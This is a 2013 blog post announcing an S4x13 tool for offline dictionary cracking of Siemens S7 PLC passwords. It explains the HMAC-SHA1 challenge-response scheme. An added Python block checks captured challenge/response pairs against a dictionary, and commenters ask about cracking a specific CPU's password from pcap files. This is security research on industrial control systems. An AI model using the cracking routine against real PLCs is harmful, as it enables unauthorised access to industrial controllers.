Wednesday, January 16, 2013

S4x13 Releases: S7 password offline bruteforce tool

As you know, the S7 protocol, used for communication between Engineering Stations, SCADA, HMI and PLCs, can be protected by a password.

On-line authentication is a simple challenge-response protocol:
  • The password is hashed (SHA1) on the client (TIA Portal)
  • The server (PLC) provides a 20-byte challenge
  • The client calculates HMAC-SHA1(challenge, SHA1(password)) as the response, i.e. HMAC-SHA1 keyed with the SHA1 digest of the password over the challenge
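To make the three steps concrete, here is an added Python example (not the released tool and not the authors' code) that models both sides of the exchange and the offline check that one captured challenge/response pair permits. It assumes that SHA1(password) is the HMAC key and the challenge is the message, and it uses constructed values instead of a real capture.

```python
import hashlib
import hmac
import os

def s7_password_hash(password: bytes) -> bytes:
    """Step 1: the client (TIA Portal) hashes the password with SHA1 (20 bytes)."""
    return hashlib.sha1(password).digest()

def s7_response(password: bytes, challenge: bytes) -> bytes:
    """Step 3: HMAC-SHA1 keyed with SHA1(password) over the 20-byte challenge.
    Assumption (labelled): key = SHA1(password), message = challenge."""
    return hmac.new(s7_password_hash(password), challenge, hashlib.sha1).digest()

def plc_verify(stored_hash: bytes, challenge: bytes, response: bytes) -> bool:
    """What the PLC side has to do: it only needs SHA1(password), never the password."""
    expected = hmac.new(stored_hash, challenge, hashlib.sha1).digest()
    return hmac.compare_digest(expected, response)

def simulate_exchange(password_on_plc: bytes, password_entered: bytes) -> dict:
    """Both sides of one authentication round, with a fresh random challenge (step 2)."""
    challenge = os.urandom(20)
    response = s7_response(password_entered, challenge)
    ok = plc_verify(s7_password_hash(password_on_plc), challenge, response)
    return {"challenge": challenge, "response": response, "ok": ok}

def check_capture_against_dictionary(challenge: bytes, response: bytes, candidates):
    """Offline check on a captured pair: there is no salt, no rate limit and no
    secret beyond the password, so each candidate costs one SHA1 + one HMAC.
    Returns the matching candidate or None. This is why password entropy is the
    only protection left once the exchange has been observed on the wire."""
    for pw in candidates:
        if hmac.compare_digest(s7_response(pw, challenge), response):
            return pw
    return None

# Constructed demo values (not from any real capture).
DEMO_CHALLENGE = bytes(range(20))
DEMO_PASSWORD = b"plc-2013"
DEMO_RESPONSE = s7_response(DEMO_PASSWORD, DEMO_CHALLENGE)
```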

Enjoy our special S4x13 release by Alexander Timorin and Dmitry Sklyarov.
The parameters are hardcoded, sorry:
cfg_pcap_file = 'path to .pcap file'
cfg_dictionary_file = 'path to dictionary file'

Feel free to contribute.


  1. Can the original PCAP be made available as well?

  2. Follow-ups:


  3. Hello,
    I want to ask whether it is possible to read the password from the ET 200 SP CPU1512SP-1PN.
    I have .pcap files.
    I am sending them by email.

